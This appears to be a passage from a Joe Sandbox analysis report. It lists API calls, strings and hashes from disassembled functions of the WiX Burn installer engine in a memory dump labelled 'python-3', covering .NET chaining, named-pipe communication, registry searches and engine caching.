                                                                                                                                    • Part of subcall function 004AD129: ReleaseMutex.KERNEL32(?), ref: 004AD1B4
                                                                                                                                    • Part of subcall function 004AD129: SetEvent.KERNEL32(?), ref: 004AD1BD
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 004AD590
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 004AD5A8
                                                                                                                                  Strings
                                                                                                                                  • NetFxSection.%ls, xrefs: 004AD2EC
                                                                                                                                  • Failed to wait for netfx chainer process to complete, xrefs: 004AD515
                                                                                                                                  • Failed to process netfx chainer message., xrefs: 004AD42B
                                                                                                                                  • Failed to allocate section name., xrefs: 004AD300
                                                                                                                                  • Failed to create netfx chainer guid., xrefs: 004AD2A3
                                                                                                                                  • %ls /pipe %ls, xrefs: 004AD362
                                                                                                                                  • NetFxEvent.%ls, xrefs: 004AD30E
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\netfxchainer.cpp, xrefs: 004AD2D4, 004AD3D6, 004AD4D3, 004AD50B
                                                                                                                                  • Failed to get netfx return code., xrefs: 004AD4DD
                                                                                                                                  • Failed to allocate netfx chainer arguments., xrefs: 004AD376
                                                                                                                                  • Failed to allocate event name., xrefs: 004AD322
                                                                                                                                  • Failed to CreateProcess on path: %ls, xrefs: 004AD3E1
                                                                                                                                  • Failed to convert netfx chainer guid into string., xrefs: 004AD2DE
                                                                                                                                  • Failed to create netfx chainer., xrefs: 004AD341
                                                                                                                                  • D, xrefs: 004AD38D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                                  • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxEvent.%ls$NetFxSection.%ls$c:\agent\_work\138\s\src\burn\engine\netfxchainer.cpp
                                                                                                                                  • API String ID: 1533322865-2112840804
                                                                                                                                  • Opcode ID: 7d54db30a64b8fdeb245f659b7259e71fb489aa588c657ca9b472305ba5fade2
                                                                                                                                  • Instruction ID: f0ab3df7afa782273b79c637deeef5e9e4dcba093af2997193b8e5255a7e70b5
                                                                                                                                  • Opcode Fuzzy Hash: 7d54db30a64b8fdeb245f659b7259e71fb489aa588c657ca9b472305ba5fade2
                                                                                                                                  • Instruction Fuzzy Hash: 9FA1D172D00328ABDB219BA5CC05FAEB7B8AF15711F10416BE90AB7251D7789D40CF99
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 004C7949
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C7B12
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C7BAF
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                                  • String ID: ($@$author$c:\agent\_work\138\s\src\libs\dutil\atomutil.cpp$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                                  • API String ID: 1555028553-2816568429
                                                                                                                                  • Opcode ID: 677c14407a993e8ff2585d4c854bc3b07c56758ae01b26b43a0fa436c99e0f29
                                                                                                                                  • Instruction ID: de0fdadd08852dbb0c432a43eaf39bbde3b15db995a0c9f132df1771863e2fa8
                                                                                                                                  • Opcode Fuzzy Hash: 677c14407a993e8ff2585d4c854bc3b07c56758ae01b26b43a0fa436c99e0f29
                                                                                                                                  • Instruction Fuzzy Hash: CCB1C279908216BBDB519BA5CC41FAE7674AF04734F30435AF521B62D1EB78EE00CB98
                                                                                                                                  APIs
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,004E750C,000000FF,?,?,?), ref: 004C75C2
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 004C75E7
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 004C7607
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 004C7623
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 004C764B
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 004C7667
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 004C76A0
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 004C76D9
                                                                                                                                    • Part of subcall function 004C7144: SysFreeString.OLEAUT32(00000000), ref: 004C727D
                                                                                                                                    • Part of subcall function 004C7144: SysFreeString.OLEAUT32(00000000), ref: 004C72BC
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C775D
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 004C780D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Compare$Free
                                                                                                                                  • String ID: ($author$c:\agent\_work\138\s\src\libs\dutil\atomutil.cpp$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                  • API String ID: 318886736-141018320
                                                                                                                                  • Opcode ID: 1da5da25f7afe6005fb6834eb34982838b8743c9cf8e7a6d79b89fc5f5125286
                                                                                                                                  • Instruction ID: 6932624e825ad296dac0a139e35696bc2d4276662e683f90e20701e3020495a7
                                                                                                                                  • Opcode Fuzzy Hash: 1da5da25f7afe6005fb6834eb34982838b8743c9cf8e7a6d79b89fc5f5125286
                                                                                                                                  • Instruction Fuzzy Hash: D3A1E43994921ABBDF619B64CC41FAE7764AF04730F20435AF521A62D0D778EE00DFA8
                                                                                                                                  APIs
                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,?,?,00000000,75A4B390,?,004845B7,?,004CB4F0), ref: 0049556E
                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,004845B7,?,004CB4F0), ref: 00495579
                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,004845B7,?,004CB4F0), ref: 004955B0
                                                                                                                                  • ConnectNamedPipe.KERNEL32(?,00000000,?,004845B7,?,004CB4F0), ref: 004955C5
                                                                                                                                  • GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 004955CF
                                                                                                                                  • Sleep.KERNEL32(00000064,?,004845B7,?,004CB4F0), ref: 00495604
                                                                                                                                  • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,004845B7,?,004CB4F0), ref: 00495627
                                                                                                                                  • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,004845B7,?,004CB4F0), ref: 00495642
                                                                                                                                  • WriteFile.KERNEL32(?,004845B7,004CB4F0,00000000,00000000,?,004845B7,?,004CB4F0), ref: 0049565D
                                                                                                                                  • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,004845B7,?,004CB4F0), ref: 00495678
                                                                                                                                  • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,004845B7,?,004CB4F0), ref: 00495693
                                                                                                                                  • GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 004956EE
                                                                                                                                  • GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 00495722
                                                                                                                                  • GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 00495756
                                                                                                                                  • GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 0049578A
                                                                                                                                  • GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 004957BB
                                                                                                                                  • GetLastError.KERNEL32(?,004845B7,?,004CB4F0), ref: 004957EC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$File$NamedPipeWrite$HandleState$ConnectCurrentProcessReadSleeplstrlen
                                                                                                                                  • String ID: Failed to read ACK from pipe.$Failed to reset pipe to blocking.$Failed to set pipe to non-blocking.$Failed to wait for child to connect to pipe.$Failed to write our process id to pipe.$Failed to write secret length to pipe.$Failed to write secret to pipe.$c:\agent\_work\138\s\src\burn\engine\pipe.cpp$crypt32.dll
                                                                                                                                  • API String ID: 2944378912-629510435
                                                                                                                                  • Opcode ID: 2c16de1eecbf8c3fa17d6bd8902e31ef7a8a66ec73609808b583c812bc1b885f
                                                                                                                                  • Instruction ID: 39f3e9faed1fd3b15ec1d4b606c9fbeeb712ad1ebf5b7f94cbb979774f6a2389
                                                                                                                                  • Opcode Fuzzy Hash: 2c16de1eecbf8c3fa17d6bd8902e31ef7a8a66ec73609808b583c812bc1b885f
                                                                                                                                  • Instruction Fuzzy Hash: FA61B776D40735ABDB11AAE58C49FAE69A89F00B51F210577FD04FB280D67C9D008BED
                                                                                                                                  APIs
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0048A509
                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 0048A531
                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,00000000,?,?,?,?,?), ref: 0048A830
                                                                                                                                  Strings
                                                                                                                                  • Failed to read registry value., xrefs: 0048A7B9
                                                                                                                                  • Failed to query registry key value size., xrefs: 0048A60D
                                                                                                                                  • Failed to open registry key., xrefs: 0048A5A4
                                                                                                                                  • Failed to allocate memory registry value., xrefs: 0048A640
                                                                                                                                  • Failed to allocate string buffer., xrefs: 0048A724
                                                                                                                                  • Failed to format key string., xrefs: 0048A516
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\search.cpp, xrefs: 0048A601, 0048A636, 0048A689, 0048A792
                                                                                                                                  • Failed to change value type., xrefs: 0048A7D4, 0048A7F7
                                                                                                                                  • Failed to set variable., xrefs: 0048A7F2
                                                                                                                                  • Unsupported registry key value type. Type = '%u', xrefs: 0048A6C3
                                                                                                                                  • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0048A5D3
                                                                                                                                  • Registry key not found. Key = '%ls', xrefs: 0048A569
                                                                                                                                  • Failed to get expand environment string., xrefs: 0048A79E
                                                                                                                                  • Failed to format value string., xrefs: 0048A53E
                                                                                                                                  • RegistrySearchValue failed: ID '%ls', HRESULT 0x%x, xrefs: 0048A808
                                                                                                                                  • Failed to query registry key value., xrefs: 0048A695
                                                                                                                                  • Failed to clear variable., xrefs: 0048A58F
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Open@16$Close
                                                                                                                                  • String ID: Failed to allocate memory registry value.$Failed to allocate string buffer.$Failed to change value type.$Failed to clear variable.$Failed to format key string.$Failed to format value string.$Failed to get expand environment string.$Failed to open registry key.$Failed to query registry key value size.$Failed to query registry key value.$Failed to read registry value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchValue failed: ID '%ls', HRESULT 0x%x$Unsupported registry key value type. Type = '%u'$c:\agent\_work\138\s\src\burn\engine\search.cpp
                                                                                                                                  • API String ID: 2348241696-920797553
                                                                                                                                  • Opcode ID: 0f532b7565b9313e0a0fc89ae1c988f77eaa12cb891c6427abf43158d5cb32c7
                                                                                                                                  • Instruction ID: 53d7521df35f22dfda5e232d50adad9cafb25ce6c9ee7b92c3f52c66ee956caf
                                                                                                                                  • Opcode Fuzzy Hash: 0f532b7565b9313e0a0fc89ae1c988f77eaa12cb891c6427abf43158d5cb32c7
                                                                                                                                  • Instruction Fuzzy Hash: 53A10676D00125FBEF11BA95CC05FAE7A74AB04710F10852BFD01BA240E7BDDE6197AA
                                                                                                                                  APIs
                                                                                                                                  • EnterCriticalSection.KERNEL32(00000100,00000100,00000100,00000000,00000100,00000000,?,0048A97A,00000100,000002C0,000002C0,00000100), ref: 00485807
                                                                                                                                  • lstrlenW.KERNEL32(000002C0,?,0048A97A,00000100,000002C0,000002C0,00000100), ref: 00485811
                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00485A16
                                                                                                                                  • LeaveCriticalSection.KERNEL32(00000100,00000000,000002C0,000002C0,00000000,000002C0,00000001,?,0048A97A,00000100,000002C0,000002C0,00000100), ref: 00485CB9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalSection$EnterLeave_wcschrlstrlen
                                                                                                                                  • String ID: *****$Failed to allocate buffer for format string.$Failed to allocate record.$Failed to allocate string.$Failed to allocate variable array.$Failed to append placeholder.$Failed to append string.$Failed to copy string.$Failed to determine variable visibility: '%ls'.$Failed to format placeholder string.$Failed to format record.$Failed to get formatted length.$Failed to get variable name.$Failed to reallocate variable array.$Failed to set record format string.$Failed to set record string.$Failed to set variable value.$[%d]$c:\agent\_work\138\s\src\burn\engine\variable.cpp
                                                                                                                                  • API String ID: 1026845265-2015882285
                                                                                                                                  • Opcode ID: db941f14704baaa7b2e76bc505a5a8d2060a231fb77ce63378228a4d8ab06598
                                                                                                                                  • Instruction ID: af55cc00388fb6a2b1421bf3971237b5e2f781a5e7bd55510bfdae0fc965a6f7
                                                                                                                                  • Opcode Fuzzy Hash: db941f14704baaa7b2e76bc505a5a8d2060a231fb77ce63378228a4d8ab06598
                                                                                                                                  • Instruction Fuzzy Hash: 45F1B476D00619FBCB11BF658841EAF7AA4EF00B54F15892FFD05AB240D77C9A018FA9
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00483A1A: GetProcessHeap.KERNEL32(?,000001C7,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A2B
                                                                                                                                    • Part of subcall function 00483A1A: RtlAllocateHeap.NTDLL(00000000,?,004823A7,?,00000001,80004005,8007139F,?,?,004C0687,8007139F,?,00000000,00000000,8007139F), ref: 00483A32
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000000,?,00000000,00000018,00000001,?,00000000,?,?,004AD33B,?,?,?), ref: 004ACCB6
                                                                                                                                  • GetLastError.KERNEL32(?,?,004AD33B,?,?,?), ref: 004ACCC3
                                                                                                                                  • ReleaseMutex.KERNEL32(?), ref: 004ACF2B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateCreateErrorEventLastMutexProcessRelease
                                                                                                                                  • String ID: %ls_mutex$%ls_send$Failed to MapViewOfFile for %ls.$Failed to allocate memory for NetFxChainer struct.$Failed to create event: %ls$Failed to create mutex: %ls$Failed to memory map cabinet file: %ls$c:\agent\_work\138\s\src\burn\engine\netfxchainer.cpp$failed to allocate memory for event name$failed to allocate memory for mutex name$failed to copy event name to shared memory structure.
                                                                                                                                  • API String ID: 3944734951-3103995003
                                                                                                                                  • Opcode ID: 917134f0ec4bca390e5677f9aa82b06784e55239e0b6389908531d4093ddd33c
                                                                                                                                  • Instruction ID: a0925fb9a490361a71b43baea6699bcb0c914e64e393283e5dfa66d45e1e6732
                                                                                                                                  • Opcode Fuzzy Hash: 917134f0ec4bca390e5677f9aa82b06784e55239e0b6389908531d4093ddd33c
                                                                                                                                  • Instruction Fuzzy Hash: F0812276A41721BBC3619B668C4AF4BBAA4BF22720F114167FD14AB380D778DD40C6EC
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 004C3770: VariantInit.OLEAUT32(?), ref: 004C3786
                                                                                                                                    • Part of subcall function 004C3770: SysAllocString.OLEAUT32(?), ref: 004C37A2
                                                                                                                                    • Part of subcall function 004C3770: VariantClear.OLEAUT32(?), ref: 004C3829
                                                                                                                                    • Part of subcall function 004C3770: SysFreeString.OLEAUT32(00000000), ref: 004C3834
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,000000FF,000000FF,Detect,000000FF,?,004CCBA8,?,?,Action,?,?,?,00000000,?), ref: 0048EBBA
                                                                                                                                  • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,Upgrade,000000FF), ref: 0048EC04
                                                                                                                                  Strings
                                                                                                                                  • Failed to get RelatedBundle nodes, xrefs: 0048EB19
                                                                                                                                  • Patch, xrefs: 0048EC84
                                                                                                                                  • Invalid value for @Action: %ls, xrefs: 0048ECF9
                                                                                                                                  • Action, xrefs: 0048EB77
                                                                                                                                  • Failed to resize Addon code array in registration, xrefs: 0048ECE3
                                                                                                                                  • Detect, xrefs: 0048EBAB
                                                                                                                                  • cabinet.dll, xrefs: 0048EC61
                                                                                                                                  • Failed to get RelatedBundle element count., xrefs: 0048EB3E
                                                                                                                                  • Failed to resize Detect code array in registration, xrefs: 0048ECD5
                                                                                                                                  • Addon, xrefs: 0048EC41
                                                                                                                                  • RelatedBundle, xrefs: 0048EAF7
                                                                                                                                  • Failed to resize Patch code array in registration, xrefs: 0048ECEA
                                                                                                                                  • version.dll, xrefs: 0048EC17
                                                                                                                                  • Failed to get @Id., xrefs: 0048ED09
                                                                                                                                  • Failed to get next RelatedBundle element., xrefs: 0048ED17
                                                                                                                                  • Failed to get @Action., xrefs: 0048ED10
                                                                                                                                  • Failed to resize Upgrade code array in registration, xrefs: 0048ECDC
                                                                                                                                  • comres.dll, xrefs: 0048EBCD
                                                                                                                                  • Upgrade, xrefs: 0048EBF7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$CompareVariant$AllocClearFreeInit
                                                                                                                                  • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array in registration$Failed to resize Detect code array in registration$Failed to resize Patch code array in registration$Failed to resize Upgrade code array in registration$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$cabinet.dll$comres.dll$version.dll
                                                                                                                                  • API String ID: 702752599-259800149
                                                                                                                                  • Opcode ID: 49c714ad318d8f9f646b9cf8604cf43f209b93e948e892be02f5828431a2889b
                                                                                                                                  • Instruction ID: 2e67de932067f219ebf988f79dfdafd124e1766818d5739be410aaf67c9d36ee
                                                                                                                                  • Opcode Fuzzy Hash: 49c714ad318d8f9f646b9cf8604cf43f209b93e948e892be02f5828431a2889b
                                                                                                                                  • Instruction Fuzzy Hash: C771CE30A00226BBCB10EE55C951EAEB7B0FF14724F20465BE911A7381C779EE02CB98
                                                                                                                                  APIs
                                                                                                                                  • InitializeCriticalSection.KERNEL32(duI,5TH,00000000,?), ref: 004876F4
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CriticalInitializeSection
                                                                                                                                  • String ID: #$$$'$0$5TH$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion$duI
                                                                                                                                  • API String ID: 32694325-1229451685
                                                                                                                                  • Opcode ID: 85ae5cc45329dc6af9f91c1c2aaf8ae57600a235230145b2a6f305d7db334b48
                                                                                                                                  • Instruction ID: 5c435c7e7f8bde586e175091eee8fe4cc66b8ea47d011e2724b869eb7a11500e
                                                                                                                                  • Opcode Fuzzy Hash: 85ae5cc45329dc6af9f91c1c2aaf8ae57600a235230145b2a6f305d7db334b48
                                                                                                                                  • Instruction Fuzzy Hash: 3C4259B4D116699FDBA5CF5AC9887CDFAB4BB48304F5085EED10CA6210C7B50B89CF49
                                                                                                                                  APIs
                                                                                                                                  • CreateFileW.KERNEL32(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,8NH,?,?,00000000,8NH,00000000), ref: 004986FB
                                                                                                                                  • GetLastError.KERNEL32 ref: 00498708
                                                                                                                                    • Part of subcall function 004C4322: ReadFile.KERNEL32(?,?,00000000,?,00000000), ref: 004C43B8
                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,004CB4A8,00000000,00000000,00000000,?,00000000,004CB4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004987B5
                                                                                                                                  • GetLastError.KERNEL32 ref: 004987BF
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,004CB4F0,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004988EA
                                                                                                                                  Strings
                                                                                                                                  • Failed to seek to beginning of engine file: %ls, xrefs: 00498761
                                                                                                                                  • Failed to create engine file at path: %ls, xrefs: 00498739
                                                                                                                                  • 8NH, xrefs: 004986B8
                                                                                                                                  • Failed to seek to signature table in exe header., xrefs: 00498854
                                                                                                                                  • Failed to update signature offset., xrefs: 00498809
                                                                                                                                  • Failed to seek to checksum in exe header., xrefs: 004987ED
                                                                                                                                  • Failed to seek to original data in exe burn section header., xrefs: 004988C3
                                                                                                                                  • c:\agent\_work\138\s\src\burn\engine\cache.cpp, xrefs: 0049872C, 004987E3, 0049884A, 004988B9
                                                                                                                                  • msi.dll, xrefs: 004987FC
                                                                                                                                  • Failed to zero out original data offset., xrefs: 004988DC
                                                                                                                                  • cabinet.dll, xrefs: 00498863
                                                                                                                                  • Failed to copy engine from: %ls to: %ls, xrefs: 00498790
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000017.00000002.2134922223.0000000000481000.00000020.00000001.01000000.0000002A.sdmp, Offset: 00480000, based on PE: true
                                                                                                                                  • Associated: 00000017.00000002.2134817298.0000000000480000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135183804.00000000004CB000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135244297.00000000004EB000.00000004.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  • Associated: 00000017.00000002.2135295846.00000000004EE000.00000002.00000001.01000000.0000002A.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_23_2_480000_python-3.jbxd
